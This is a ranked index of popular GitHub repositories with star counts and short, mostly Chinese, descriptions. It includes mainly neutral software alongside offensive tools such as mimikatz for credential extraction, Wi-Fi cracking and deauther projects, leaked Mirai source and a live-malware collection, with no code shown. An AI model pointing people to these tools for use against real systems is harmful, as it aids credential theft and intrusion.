- [**12973**星][10d] [facert/awesome-spider](https://github.com/facert/awesome-spider) 爬虫集合
- [**12948**星][10d] [C] [openssl/openssl](https://github.com/openssl/openssl) TLS/SSL and crypto library
- [**12802**星][10d] [JS] [gitsquared/edex-ui](https://github.com/gitsquared/edex-ui) A cross-platform, customizable science fiction terminal emulator with advanced monitoring & touchscreen support.
- [**12754**星][10d] [Go] [buger/goreplay](https://github.com/buger/goreplay) 实时捕获HTTP流量并输入测试环境,以便持续使用真实数据测试你的系统
- [**12689**星][7d] [ruanyf/weekly](https://github.com/ruanyf/weekly) 科技爱好者周刊,每周五发布
- [**12561**星][10d] [QML] [swordfish90/cool-retro-term](https://github.com/swordfish90/cool-retro-term) A good looking terminal emulator which mimics the old cathode display...
- [**12481**星][10d] [C] [radareorg/radare2](https://github.com/radareorg/radare2) UNIX-like reverse engineering framework and command-line toolset
- [**12456**星][10d] [Java] [oracle/graal](https://github.com/oracle/graal) Run Programs Faster Anywhere
- [**12414**星][11d] [Ruby] [diaspora/diaspora](https://github.com/diaspora/diaspora) A privacy-aware, distributed, open source social network.
- [**12244**星][4m] [Py] [swisskyrepo/payloadsallthethings](https://github.com/swisskyrepo/payloadsallthethings) A list of useful payloads and bypass for Web Application Security and Pentest/CTF
- [**12083**星][10d] [Go] [ehang-io/nps](https://github.com/ehang-io/nps) 一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。a lightweight, high-performance, powerful intranet penetration proxy server, with a powerful web management terminal.
- [**12036**星][10d] [enaqx/awesome-pentest](https://github.com/enaqx/awesome-pentest) 渗透测试资源/工具集
- [**12020**星][10d] [C++] [opengenus/cosmos](https://github.com/opengenus/cosmos) Algorithms that run our universe | Your personal library of every algorithm and data structure code that you will ever encounter | Ask us anything at our forum |
- [**12002**星][4m] [Py] [owasp/cheatsheetseries](https://github.com/owasp/cheatsheetseries) The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics.
- [**11999**星][7d] [C] [facebook/zstd](https://github.com/facebook/zstd) 快速实时压缩算法
- [**11865**星][8m] [C] [robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) 世界上最快的互联网端口扫描器,号称可6分钟内扫描整个互联网
- [**11814**星][10d] [Go] [xtaci/kcptun](https://github.com/xtaci/kcptun) A Stable & Secure Tunnel based on KCP with N:M multiplexing and FEC. Available for ARM, MIPS, 386 and AMD64
- [**11782**星][7d] [Shell] [233boy/v2ray](https://github.com/233boy/v2ray) 最好用的 V2Ray 一键安装脚本 & 管理脚本
- [**11728**星][10d] [Go] [goharbor/harbor](https://github.com/goharbor/harbor) 可信云本地注册表项目,用于存储、签名和扫描内容
- [**11516**星][10d] [Shell] [nyr/openvpn-install](https://github.com/nyr/openvpn-install) OpenVPN安装:Ubuntu, Debian, CentOS和Fedora
- [**11427**星][10d] [Go] [txthinking/brook](https://github.com/txthinking/brook) Go语言编写的跨平台代理
- [**11265**星][10d] [CSS] [hacker0x01/hacker101](https://github.com/hacker0x01/hacker101) Source code for Hacker101.com - a free online web and mobile security class.
- [**11183**星][10d] [Java] [konloch/bytecode-viewer](https://github.com/konloch/bytecode-viewer) 一个Java 8+ Jar和Android APK逆向工程套件(反编译器、编辑器、调试器和更多)
- [**11135**星][10d] [JS] [http-party/node-http-proxy](https://github.com/http-party/node-http-proxy) 支持websocket的HTTP可编程代理库
- [**11094**星][10d] [C++] [trojan-gfw/trojan](https://github.com/trojan-gfw/trojan) 一个不可识别的机制,帮助您绕过GFW。
- [**11075**星][5m] [ObjC] [flipboard/flex](https://github.com/flipboard/flex) 一个用于iOS的应用内调试和探索工具
- [**11059**星][2y] [ObjC] [bang590/jspatch](https://github.com/bang590/jspatch) 使用Objective-C运行时桥接Objective-C和Javascript。可以在JavaScript中调用任何Objective-C类和方法,只需要包含一个小引擎。通常用于修复iOS应用
- [**10931**星][3y] [CoffeeScript] [dropbox/zxcvbn](https://github.com/dropbox/zxcvbn) 低预算的密码强度估计
- [**10845**星][10d] [Go] [gocolly/colly](https://github.com/gocolly/colly) Go编写的爬虫框架
- [**10755**星][10d] [Ruby] [rubocop-hq/rubocop](https://github.com/rubocop-hq/rubocop) A Ruby static code analyzer and formatter, based on the community Ruby style guide.
- [**10603**星][7d] [JS] [matt-esch/virtual-dom](https://github.com/matt-esch/virtual-dom) 一个虚拟的DOM比较算法
- [**10564**星][3m] [Go] [ehang-io/nps](https://github.com/ehang-io/nps) 一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。a lightweight, high-performance, powerful intranet penetration proxy server, with a powerful web management terminal.
- [**10532**星][10d] [JS] [valve/fingerprintjs2](https://github.com/valve/fingerprintjs2) 浏览器指纹识别库
- [**10448**星][3m] [C++] [microsoft/lightgbm](https://github.com/microsoft/lightgbm) 一种基于决策树算法的快速、分布式、高性能梯度增强(GBT、GBDT、GBRT、GBM或MART)框架,用于排序、分类等多种机器学习任务。
- [**10267**星][4m] [Py] [sherlock-project/sherlock](https://github.com/sherlock-project/sherlock) 在不同的社交网站下查找用户名
- [**10266**星][3m] [C++] [valvesoftware/proton](https://github.com/valvesoftware/proton) 基于Wine和其他组件运行Steam Play
- [**10156**星][11d] [Py] [apachecn/awesome-algorithm](https://github.com/apachecn/awesome-algorithm) 项目永久冻结,迁移至新地址:
- [**10040**星][10d] [Shell] [alex000kim/nsfw_data_scraper](https://github.com/alex000kim/nsfw_data_scraper) Collection of scripts to aggregate image data for the purposes of training an NSFW Image Classifier
- [**10034**星][10d] [Shell] [xdissent/ievms](https://github.com/xdissent/ievms) 自动安装的微软IE应用程序Compat虚拟机
- [**10030**星][3m] [imthenachoman/how-to-secure-a-linux-server](https://github.com/imthenachoman/how-to-secure-a-linux-server) 一个不断发展的如何保护Linux服务器的指南
- [**9894**星][10d] [JS] [localtunnel/localtunnel](https://github.com/localtunnel/localtunnel) 向世界公开您的本地主机,以方便测试和共享
- [**9795**星][10d] [C] [gentilkiwi/mimikatz](https://github.com/gentilkiwi/mimikatz) 从内存中提取明文密码、散列、PIN码和kerberos票据。pass-the-hash, pass-the-ticket 或构建Golden tickets
- [**9781**星][10d] [Py] [openai/baselines](https://github.com/openai/baselines) 强化学习算法的高质量实现
- [**9716**星][10d] [Py] [jhao104/proxy_pool](https://github.com/jhao104/proxy_pool) Python爬虫代理IP池
- [**9682**星][10d] [Py] [sovereign/sovereign](https://github.com/sovereign/sovereign) 一套Ansible剧本来建立和维护自己的私有云:电子邮件,日历,联系人,文件同步,IRC保镖,VPN,和更多
- [**9657**星][4m] [ObjC] [gnachman/iterm2](https://github.com/gnachman/iterm2) 一个Mac OS X的终端模拟器,它可以做很多令人惊奇的事情
- [**9649**星][3m] [C++] [arendst/tasmota](https://github.com/arendst/Tasmota) 支持ESP8266的备选固件,使用webUI、OTA更新、使用计时器或规则的自动化、可扩展性和对MQTT、HTTP、串行或KNX的完全本地控制
- [**9553**星][3m] [PS] [lukesampson/scoop](https://github.com/lukesampson/scoop) 从命令行以最小的摩擦安装程序
- [**9536**星][4m] [Java] [ibotpeaches/apktool](https://github.com/ibotpeaches/apktool) 逆向Android apk文件
- [**9536**星][10d] [C++] [google/tink](https://github.com/google/tink) 轻量级加密库,能够安全、简单、简洁、快速的完成一些普通加密任务
- [**9528**星][4m] [C#] [icsharpcode/ilspy](https://github.com/icsharpcode/ilspy) .NET反编译器,支持PDB生成,ReadyToRun,元数据(及更多)-跨平台!
- [**9434**星][4m] [C++] [yuzu-emu/yuzu](https://github.com/yuzu-emu/yuzu) 任天堂Switch模拟器
- [**9397**星][10d] [C++] [shiqiyu/libfacedetection](https://github.com/shiqiyu/libfacedetection) 图像中的人脸检测
- [**9355**星][10d] [JS] [qrohlf/trianglify](https://github.com/qrohlf/trianglify) 生成漂亮的SVG背景图像
- [**9323**星][10d] [Py] [waditu/tushare](https://github.com/waditu/tushare) 一个抓取中国股票历史数据的工具
- [**9293**星][7d] [microsoft/wsl](https://github.com/microsoft/WSL) Issues found on WSL
- [**9168**星][8m] [vitalysim/awesome-hacking-resources](https://github.com/vitalysim/awesome-hacking-resources) A collection of hacking / penetration testing resources to make you better!
- [**9071**星][4m] [Java] [android-hacker/virtualxposed](https://github.com/android-hacker/virtualxposed) 无需Root使用xposed,解锁Bootloader或修改系统映像等
- [**8948**星][7d] [Java] [code4craft/webmagic](https://github.com/code4craft/webmagic) A scalable web crawler framework for Java.
- [**8885**星][8d] [Py] [wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) 流氓AP框架, 用于RedTeam和Wi-Fi安全测试
- [**8884**星][10d] [Go] [rkt/rkt](https://github.com/rkt/rkt) [Project ended] rkt is a pod-native container engine for Linux. It is composable, secure, and built on standards.
- [**8763**星][10d] [Go] [snail007/goproxy](https://github.com/snail007/goproxy) golang实现的高性能http,https,websocket,tcp,socks5代理服务器,支持内网穿透,链式代理,通讯加密,智能HTTP,SOCKS5代理,黑白名单,限速,限流量,限连接数,跨平台,KCP支持,认证API。
- [**8739**星][2m] [Jupyter Notebook] [google/dopamine](https://github.com/google/dopamine) 增强学习算法快速原型化的研究框架。
- [**8725**星][7d] [brannondorsey/wifi-cracking](https://github.com/brannondorsey/wifi-cracking) 破解WPA/WPA2 Wi-Fi 路由器
- [**8634**星][7d] [Swift] [yanue/v2rayu](https://github.com/yanue/v2rayu) V2rayU,基于v2ray核心的mac版客户端,用于科学上网,使用swift编写,支持vmess,shadowsocks,socks5等服务协议,支持订阅, 支持二维码,剪贴板导入,手动配置,二维码分享等
- [**8606**星][10d] [C] [irungentoo/toxcore](https://github.com/irungentoo/toxcore) 即时通讯,支持所有主流平台
- [**8500**星][10d] [Java] [java-decompiler/jd-gui](https://github.com/java-decompiler/jd-gui) 一个独立的Java反编译GUI
- [**8454**星][10d] [JS] [netflix/pollyjs](https://github.com/netflix/pollyjs) 独立的、与框架无关的JavaScript库,支持对HTTP交互进行记录、回放和存根处理
- [**8394**星][10d] [Py] [shengqiangzhang/examples-of-web-crawlers](https://github.com/shengqiangzhang/examples-of-web-crawlers) 一些非常有趣的python爬虫例子,对新手比较友好,主要爬取淘宝、天猫、微信、豆瓣、QQ等网站
- [**8265**星][3m] [Shell] [retropie/retropie-setup](https://github.com/retropie/retropie-setup) Shell脚本,设置树莓派/Odroid/PC与复古模拟器和各种核心
- [**8203**星][10d] [Py] [facebook/chisel](https://github.com/facebook/chisel) Chisel is a collection of LLDB commands to assist debugging iOS apps.
- [**8159**星][3m] [Jupyter Notebook] [atsushisakai/pythonrobotics](https://github.com/atsushisakai/pythonrobotics) Python sample codes for robotics algorithms.
- [**8143**星][5m] [JS] [gchq/cyberchef](https://github.com/gchq/cyberchef) 网络瑞士军刀-一个用于加密,编码,压缩和数据分析的网络应用程序
- [**8123**星][3m] [trimstray/the-practical-linux-hardening-guide](https://github.com/trimstray/the-practical-linux-hardening-guide) 指南详细介绍了如何创建安全的Linux生产系统。
- [**8097**星][5m] [JS] [microsoft/chakracore](https://github.com/microsoft/chakracore) 支持Microsoft Edge的Chakra JavaScript引擎的核心部分
- [**8074**星][10d] [ObjC] [shadowsocks/shadowsocks-ios](https://github.com/shadowsocks/shadowsocks-ios) Removed according to regulations.
- [**8064**星][10d] [Go] [cyfdecyf/cow](https://github.com/cyfdecyf/cow) 用Go编写的HTTP代理。COW可以自动识别被屏蔽的网站,并使用父代理进行访问
- [**8053**星][5m] [Py] [mailpile/mailpile](https://github.com/mailpile/mailpile) 电子邮件客户端,用户友好的加密和隐私功能
- [**7973**星][10d] [Go] [sqshq/sampler](https://github.com/sqshq/sampler) 用于shell命令执行、可视化和警报的工具。配置了一个简单的YAML文件
- [**7967**星][10d] [Py] [threat9/routersploit](https://github.com/threat9/routersploit) 嵌入式设备漏洞利用框架
- [**7900**星][11d] [PHP] [friendsofphp/goutte](https://github.com/friendsofphp/goutte) Goutte, a simple PHP Web Scraper
- [**7899**星][10d] [acdlite/react-fiber-architecture](https://github.com/acdlite/react-fiber-architecture) 介绍了React的新核心算法React Fiber
- [**7886**星][4m] [Go] [git-lfs/git-lfs](https://github.com/git-lfs/git-lfs) Git extension for versioning large files
- [**7760**星][1y] [Java] [didi/virtualapk](https://github.com/didi/virtualapk) 一个强大的轻量级Android插件框架
- [**7718**星][11d] [Py] [scrapinghub/portia](https://github.com/scrapinghub/portia) 以可视方式使用Scrapy爬取web
- [**7714**星][10d] [C] [hashcat/hashcat](https://github.com/hashcat/hashcat) 世界上最快最先进的密码恢复工具
- [**7673**星][10d] [C++] [keepassxreboot/keepassxc](https://github.com/keepassxreboot/keepassxc) KeePassXC is a cross-platform community-driven port of the Windows application “Keepass Password Safe”.
- [**7667**星][10d] [Go] [nats-io/nats-server](https://github.com/nats-io/nats-server) 用于NATS的高性能服务器,云本地消息系统。
- [**7608**星][5m] [Py] [s0md3v/xsstrike](https://github.com/s0md3v/XSStrike) 最先进的XSS扫描仪
- [**7601**星][10d] [Shell] [etherdream/jsproxy](https://github.com/etherdream/jsproxy) 一个基于浏览器端 JS 实现的在线代理
- [**7577**星][4m] [Swift] [krzyzanowskim/cryptoswift](https://github.com/krzyzanowskim/cryptoswift) 越来越多的标准和安全的加密算法在Swift中实现
- [**7573**星][10d] [Shell] [awslabs/git-secrets](https://github.com/awslabs/git-secrets) 防止您将机密和凭据提交到git存储库
- [**7546**星][7m] [C++] [shadowsocks/shadowsocks-qt5](https://github.com/shadowsocks/shadowsocks-qt5) 跨平台的shadowsocks GUI客户端
- [**7484**星][11d] [Java] [pxb1988/dex2jar](https://github.com/pxb1988/dex2jar) 用于处理android .dex和java .class文件的工具
- [**7461**星][7d] [Go] [future-architect/vuls](https://github.com/future-architect/vuls) 针对Linux/FreeBSD 编写的漏洞扫描器. Go 语言编写
- [**7434**星][5m] [Java] [lionsoul2014/ip2region](https://github.com/lionsoul2014/ip2region) 一个离线IP位置库,其准确率为99.9%,搜索性能为0.0x毫秒。数据库文件小于5Mb,包含所有IP地址均
- [**7419**星][3m] [C++] [coatisoftware/sourcetrail](https://github.com/coatisoftware/sourcetrail) Sourcetrail - free and open-source interactive source explorer
- [**7408**星][10d] [Py] [clips/pattern](https://github.com/clips/pattern) Web mining module for Python, with tools for scraping, natural language processing, machine learning, network analysis and visualization.
- [**7401**星][10d] [Shell] [teddysun/shadowsocks_install](https://github.com/teddysun/shadowsocks_install) 自动安装Shadowsocks服务器。CentOS/Debian/Ubuntu
- [**7368**星][7m] [Shell] [kholia/osx-kvm](https://github.com/kholia/osx-kvm) 在QEMU/KVM上运行macOS。
- [**7335**星][8d] [Java] [zaproxy/zaproxy](https://github.com/zaproxy/zaproxy) 在开发和测试Web App时自动发现安全漏洞
- [**7319**星][10d] [JS] [cs01/gdbgui](https://github.com/cs01/gdbgui) 基于浏览器gdb前端
- [**7305**星][11d] [tayllan/awesome-algorithms](https://github.com/tayllan/awesome-algorithms) A curated list of awesome places to learn and/or practice algorithms.
- [**7294**星][10d] [Py] [networkx/networkx](https://github.com/networkx/networkx) 用于创建、操纵和研究复杂网络的结构,Python包
- [**7249**星][10d] [TS] [peers/peerjs](https://github.com/peers/peerjs) 完整的、可配置的、易于使用的基于WebRTC的P2P API,支持数据通道和媒体流。
- [**7240**星][10d] [Go] [bettercap/bettercap](https://github.com/bettercap/bettercap) 用于802.11、BLE和以太网的瑞士军刀,侦察和MITM攻击
- [**7203**星][10d] [Rust] [denisidoro/navi](https://github.com/denisidoro/navi) An interactive cheatsheet tool for the command-line and application launchers
- [**7095**星][10d] [Shell] [cisofy/lynis](https://github.com/cisofy/lynis) 用于Linux、macOS和基于unix的系统的安全审计工具
- [**7075**星][8d] [greatfire/wiki](https://github.com/greatfire/wiki) (自由浏览)直接点击就能畅快浏览谷歌、推特、脸书
- [**7053**星][4m] [Py] [h2y/shadowrocket-adblock-rules](https://github.com/h2y/shadowrocket-adblock-rules) 提供多款 Shadowrocket 规则,带广告过滤功能。用于 iOS 未越狱设备选择性地自动翻墙。
- [**7004**星][10d] [C++] [radareorg/cutter](https://github.com/radareorg/cutter) 逆向框架 radare2的Qt界面,iaito的升级版
- [**6973**星][7d] [JS] [avwo/whistle](https://github.com/avwo/whistle) 基于Node实现的跨平台抓包调试代理工具(HTTP, HTTP2, HTTPS, Websocket)
- [**6904**星][1y] [Java] [amitshekhariitbhu/android-debug-database](https://github.com/amitshekhariitbhu/android-debug-database) 一个用于调试android数据库和共享首选项的库
- [**6897**星][7d] [PS] [powershellmafia/powersploit](https://github.com/PowerShellMafia/PowerSploit) 一组Microsoft PowerShell模块,可用于在评估的所有阶段帮助渗透测试人员
- [**6891**星][10d] [Py] [seatgeek/fuzzywuzzy](https://github.com/seatgeek/fuzzywuzzy) Python中的模糊字符串匹配
- [**6868**星][10d] [PHP] [guyueyingmu/avbook](https://github.com/guyueyingmu/avbook) AV 电影管理系统, avmoo , javbus , javlibrary 爬虫,线上 AV 影片图书馆,AV 磁力链接数据库
- [**6733**星][10d] [Go] [casbin/casbin](https://github.com/casbin/casbin) 一个授权库,支持访问控制模型,如ACL, RBAC, ABAC在Golang
- [**6730**星][3m] [C++] [marlinfirmware/marlin](https://github.com/marlinfirmware/marlin) 基于Arduino平台的RepRap 3D打印机优化固件
- [**6701**星][3y] [C++] [alibaba/andfix](https://github.com/alibaba/andfix) 为Android应用提供热修复的库。
- [**6655**星][10d] [Go] [shadowsocks/shadowsocks-go](https://github.com/shadowsocks/shadowsocks-go) go port of shadowsocks (Deprecated)
- [**6605**星][2y] [Jupyter Notebook] [coells/100days](https://github.com/coells/100days) 加密100天(100个练习)
- [**6596**星][10d] [Go] [quay/clair](https://github.com/quay/clair) Vulnerability Static Analysis for Containers
- [**6596**星][10d] [Go] [quay/clair](https://github.com/quay/clair) 容器(appc、docker)漏洞静态分析工具。
- [**6589**星][10d] [C] [qmk/qmk_firmware](https://github.com/qmk/qmk_firmware) 开源键盘固件Atmel AVR和Arm USB家族
- [**6581**星][10d] [shadowsocksrr/shadowsocksr-android](https://github.com/shadowsocksrr/shadowsocksr-android) A ShadowsocksR client for Android
- [**6572**星][10d] [C] [spacehuhntech/esp8266_deauther](https://github.com/SpacehuhnTech/esp8266_deauther) 使用ESP8266 制作Wifi干扰器
- [**6555**星][10d] [jeffgerickson/algorithms](https://github.com/jeffgerickson/algorithms) Bug-tracking for Jeff's algorithms book, notes, etc.
- [**6533**星][10d] [Py] [gallopsled/pwntools](https://github.com/gallopsled/pwntools) CTF框架+漏洞开发库
- [**6523**星][10d] [Roff] [max2max/freess](https://github.com/max2max/freess) 免费ss账号 免费shadowsocks账号 免费v2ray账号 (长期更新)
- [**6507**星][7d] [HTML] [open-power-workgroup/hospital](https://github.com/open-power-workgroup/hospital) OpenPower工作组收集汇总的医院开放数据
- [**6469**星][10d] [Py] [mlflow/mlflow](https://github.com/mlflow/mlflow) 机器学习生命周期
- [**6468**星][3m] [C] [softethervpn/softethervpn](https://github.com/softethervpn/softethervpn) Cross-platform multi-protocol VPN software. Pull requests are welcome. The stable version is available at
- [**6461**星][10d] [Go] [usefathom/fathom](https://github.com/usefathom/fathom) 一个更简单、更注重隐私的谷歌分析的替代品。
- [**6453**星][10d] [ASP] [hq450/fancyss](https://github.com/hq450/fancyss) 用于asuswrt/merlin/openwrt为基础的,带软件中心固件路由器的科学上网
- [**6451**星][10d] [Py] [asciimoo/searx](https://github.com/asciimoo/searx) 网络元数据搜索引擎。汇总70 多个搜索引擎的搜素结果,避免用户被追踪或者被分析。可与 Tor 结合使用
- [**6433**星][10d] [Py] [cyrus-and/gdb-dashboard](https://github.com/cyrus-and/gdb-dashboard) Python中用于GDB的模块化可视化界面
- [**6407**星][1y] [stascorp/rdpwrap](https://github.com/stascorp/rdpwrap) RDP包装器库
- [**6398**星][12d] [Go] [henrylee2cn/pholcus](https://github.com/henrylee2cn/pholcus) 是一款用户只需编写采集规则的高并发分布式爬虫软件, 支持单机、服务端、客户端三种运行模式,拥有Web、GUI、命令行三种操作界面
- [**6397**星][11d] [rmerl/asuswrt-merlin](https://github.com/rmerl/asuswrt-merlin) 华硕路由器固件(Asuswrt)的增强版(旧版代码库)
- [**6393**星][10d] [Py] [yandex/gixy](https://github.com/yandex/gixy) Nginx 配置静态分析工具,防止配置错误导致安全问题,自动化错误配置检测
- [**6365**星][10d] [Py] [the-art-of-hacking/h4cker](https://github.com/The-Art-of-Hacking/h4cker) 资源收集:hacking、渗透、数字取证、事件响应、漏洞研究、漏洞开发、逆向
- [**6364**星][12m] [JS] [haotian-wang/google-access-helper](https://github.com/haotian-wang/google-access-helper) 谷歌访问助手破解版
- [**6357**星][2m] [JS] [alibaba/anyproxy](https://github.com/alibaba/anyproxy) NodeJS中完全可配置的http/https代理
- [**6352**星][4m] [TS] [chimurai/http-proxy-middleware](https://github.com/chimurai/http-proxy-middleware) js代理变得很简单。轻松配置代理中间件,支持连接、表达、浏览器同步等功能
- [**6340**星][11d] [Java] [google/android-classyshark](https://github.com/google/android-classyshark) 分析基于Android/Java的App或游戏
- [**6298**星][10d] [Java] [qihoo360/replugin](https://github.com/qihoo360/replugin) RePlugin - A flexible, stable, easy-to-use Android Plug-in Framework
- [**6284**星][4m] [C#] [unity-technologies/unitycsreference](https://github.com/unity-technologies/unitycsreference) Unity c#参考源代码
- [**6265**星][5m] [Java] [droidpluginteam/droidplugin](https://github.com/droidpluginteam/droidplugin) android上的插件框架,运行任何第三方apk,无需安装、修改或重新打包
- [**6262**星][10d] [C++] [dolphin-emu/dolphin](https://github.com/dolphin-emu/dolphin) 一个GameCube / Wii模拟器,可以让你在PC上玩这两个平台的游戏。
- [**6260**星][10d] [ObjC] [johnno1962/injectionforxcode](https://github.com/johnno1962/injectionforxcode) Runtime Code Injection for Objective-C & Swift
- [**6252**星][6m] [Py] [s0md3v/photon](https://github.com/s0md3v/Photon) 用于OSINT的超快速爬虫,爬取时提取以下信息:URL、文件、邮件、社交账户、Amazon Bucket、密钥、JS文件与终端、符合自定义正则的字符串、子域名、DNS相关数据
- [**6246**星][10d] [Py] [schollz/howmanypeoplearearound](https://github.com/schollz/howmanypeoplearearound) 监控 Wifi 信号统计你周围的人数
- [**6244**星][10d] [JS] [mgechev/javascript-algorithms](https://github.com/mgechev/javascript-algorithms)
- [**6239**星][10d] [Go] [inlets/inlets](https://github.com/inlets/inlets) 结合反向代理和websocket隧道,通过一个出口节点将您的内部和开发端点暴露给公共Internet
- [**6189**星][2y] [Hack] [facebook/fbctf](https://github.com/facebook/fbctf) 托管CTF比赛的平台
- [**6171**星][6m] [berzerk0/probable-wordlists](https://github.com/berzerk0/probable-wordlists) Version 2 is live! Wordlists sorted by probability originally created for password generation and testing - make sure your passwords aren't popular!
- [**6155**星][10d] [C] [rofl0r/proxychains-ng](https://github.com/rofl0r/proxychains-ng) proxychains ng (new generation) - a preloader which hooks calls to sockets in dynamically linked programs and redirects it through one or more socks/http proxies. continuation of the unmaintained proxychains project. the sf.net page is currently not updated, use releases from github release page instead.
- [**6146**星][10d] [Go] [crawlab-team/crawlab](https://github.com/crawlab-team/crawlab) Distributed web crawler admin platform for spiders management regardless of languages and frameworks. 分布式爬虫管理平台,支持任何语言和框架
- [**6144**星][10d] [JS] [swagger-api/swagger-editor](https://github.com/swagger-api/swagger-editor) 在浏览器内编辑YAML中的Swagger API规范,并实时预览文档
- [**6142**星][3y] [C] [jgamblin/mirai-source-code](https://github.com/jgamblin/mirai-source-code) 研究/IoC开发目的而泄露的Mirai源代码
- [**6103**星][10d] [Py] [refirmlabs/binwalk](https://github.com/ReFirmLabs/binwalk) 固件分析工具(命令行+IDA插件)
- [IDA插件](https://github.com/ReFirmLabs/binwalk/tree/master/src/scripts)
- [binwalk](https://github.com/ReFirmLabs/binwalk/tree/master/src/binwalk)
- [**6100**星][10d] [rshipp/awesome-malware-analysis](https://github.com/rshipp/awesome-malware-analysis) A curated list of awesome malware analysis tools and resources.
- [**6088**星][10d] [JS] [sindresorhus/fkill-cli](https://github.com/sindresorhus/fkill-cli) 难以置信地杀死进程
- [**6083**星][10d] [C] [xoreaxeaxeax/movfuscator](https://github.com/xoreaxeaxeax/movfuscator) C编译器,编译的二进制文件只有1个代码块。
- [**6034**星][10d] [Gnuplot] [nasa-jpl/open-source-rover](https://github.com/nasa-jpl/open-source-rover) A build-it-yourself, 6-wheel rover based on the rovers on Mars!
- [**6027**星][10d] [C] [nodemcu/nodemcu-firmware](https://github.com/nodemcu/nodemcu-firmware) 基于Lua的交互式固件,适用于ESP8266、ESP8285和ESP32
- [**6008**星][7d] [Py] [mobsf/mobile-security-framework-mobsf](https://github.com/MobSF/Mobile-Security-Framework-MobSF) 一个自动化的、一体化的移动应用程序(Android/iOS/Windows)渗透测试、恶意软件分析和安全评估框架,能够执行静态和动态分析
- [**5998**星][10d] [Py] [mobsf/mobile-security-framework-mobsf](https://github.com/MobSF/Mobile-Security-Framework-MobSF) Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.
- [**5987**星][2y] [qinyuhang/shadowsocksx-ng-r](https://github.com/qinyuhang/shadowsocksx-ng-r) Next Generation of ShadowsocksX
- [**5966**星][8m] [Py] [luyishisi/anti-anti-spider](https://github.com/luyishisi/anti-anti-spider) 越来越多的网站具有反爬虫特性,有的用图片隐藏关键数据,有的使用反人类的验证码,建立反反爬虫的代码仓库,通过与不同特性的网站做斗争(无恶意)提高技术。
- [**5961**星][7d] [Shell] [vulhub/vulhub](https://github.com/vulhub/vulhub) 基于Docker-Compose的预构建Vulnerable环境
- [**5956**星][10d] [Py] [kivy/python-for-android](https://github.com/kivy/python-for-android) 将您的Python应用程序转换为Android APK
- [**5950**星][10d] [Go] [dnscrypt/dnscrypt-proxy](https://github.com/DNSCrypt/dnscrypt-proxy) 灵活的DNS代理,支持现代的加密DNS协议,例如:DNS protocols such as DNSCrypt v2, DNS-over-HTTPS and Anonymized DNSCrypt.
- [**5911**星][4m] [JS] [wix/detox](https://github.com/wix/detox) 移动应用端到端测试和自动化框架
- [**5848**星][11d] [Py] [newsapps/beeswithmachineguns](https://github.com/newsapps/beeswithmachineguns) 创建多个micro EC2实例, 攻击指定Web App
- [**5825**星][2m] [carpedm20/awesome-hacking](https://github.com/carpedm20/awesome-hacking) Hacking教程、工具和资源
- [**5814**星][10d] [HTML] [owasp/owasp-mstg](https://github.com/owasp/owasp-mstg) 关于移动App安全开发、测试和逆向的相近手册
- [**5785**星][8m] [ObjC] [square/ponydebugger](https://github.com/square/ponydebugger) 远程网络和数据调试为您的原生iOS应用程序使用Chrome开发工具
- [**5784**星][10d] [Java] [guardianproject/haven](https://github.com/guardianproject/haven) 通过Android应用和设备上的传感器保护自己的个人空间和财产而又不损害
- [**5758**星][10d] [Py] [ytisf/thezoo](https://github.com/ytisf/thezoo) A repository of LIVE malwares for your own joy and pleasure.
- [**5742**星][11d] [Ruby] [presidentbeef/brakeman](https://github.com/presidentbeef/brakeman) RoR程序的静态分析工具
- [**5738**星][10d] [Py] [axi0mx/ipwndfu](https://github.com/axi0mx/ipwndfu) 许多iOS设备的开源越狱工具
- [**5702**星][2y] [JS] [liftoff/gateone](https://github.com/liftoff/gateone) 一个html5支持的终端模拟器和SSH客户端
- [**5627**星][10d] [Go] [ginuerzh/gost](https://github.com/ginuerzh/gost) GO语言实现的安全隧道
- [**5624**星][10d] [Java] [thingsboard/thingsboard](https://github.com/thingsboard/thingsboard) Open-source IoT Platform - Device management, data collection, processing and visualization.
- [**5624**星][10d] [hq450/fancyss_history_package](https://github.com/hq450/fancyss_history_package) 科学上网插件的离线安装包储存在这里
- [**5613**星][10d] [sbilly/awesome-security](https://github.com/sbilly/awesome-security) 与安全相关的软件、库、文档、书籍、资源和工具等收集
- [**5604**星][10d] [Shell] [kylemanna/docker-openvpn](https://github.com/kylemanna/docker-openvpn) 一个带有EasyRSA PKI CA的Docker容器
- [**5582**星][10d] [Go] [jetstack/cert-manager](https://github.com/jetstack/cert-manager) 在Kubernetes自动提供和管理TLS证书
- [**5545**星][10d] [Py] [awslabs/aws-shell](https://github.com/awslabs/aws-shell) 与AWS CLI一起工作的集成Shell
- [**5524**星][10d] [Shell] [foxlet/macos-simple-kvm](https://github.com/foxlet/macos-simple-kvm) Tools to set up a quick macOS VM in QEMU, accelerated by KVM.
- [**5523**星][4m] [Go] [zricethezav/gitleaks](https://github.com/zricethezav/gitleaks) 审计git repo的秘密
- [**5504**星][11d] [TS] [jigsaw-code/outline-client](https://github.com/jigsaw-code/outline-client) 使用流行的Shadowsocks协议,并依靠Cordova和Electron框架来支持Windows、Android / ChromeOS、Linux、iOS和macOS
- [**5443**星][10d] [Go] [slackhq/nebula](https://github.com/slackhq/nebula) A scalable overlay networking tool with a focus on performance, simplicity and security
- [**5439**星][11m] [C] [pwn20wndstuff/undecimus](https://github.com/pwn20wndstuff/undecimus) 为iOS 11.0 - 12.4的unc0ver越狱
- [**5424**星][10d] [Rust] [autumnai/leaf](https://github.com/autumnai/leaf) 为黑客开放的机器智能框架。(GPU / CPU)
- [**5415**星][10d] [C] [upx/upx](https://github.com/upx/upx) 可执行文件的终极加壳程序
- [**5405**星][10d] [Py] [shadowsocksr-backup/shadowsocksr](https://github.com/shadowsocksr-backup/shadowsocksr) ShadowsocksR的Python版本
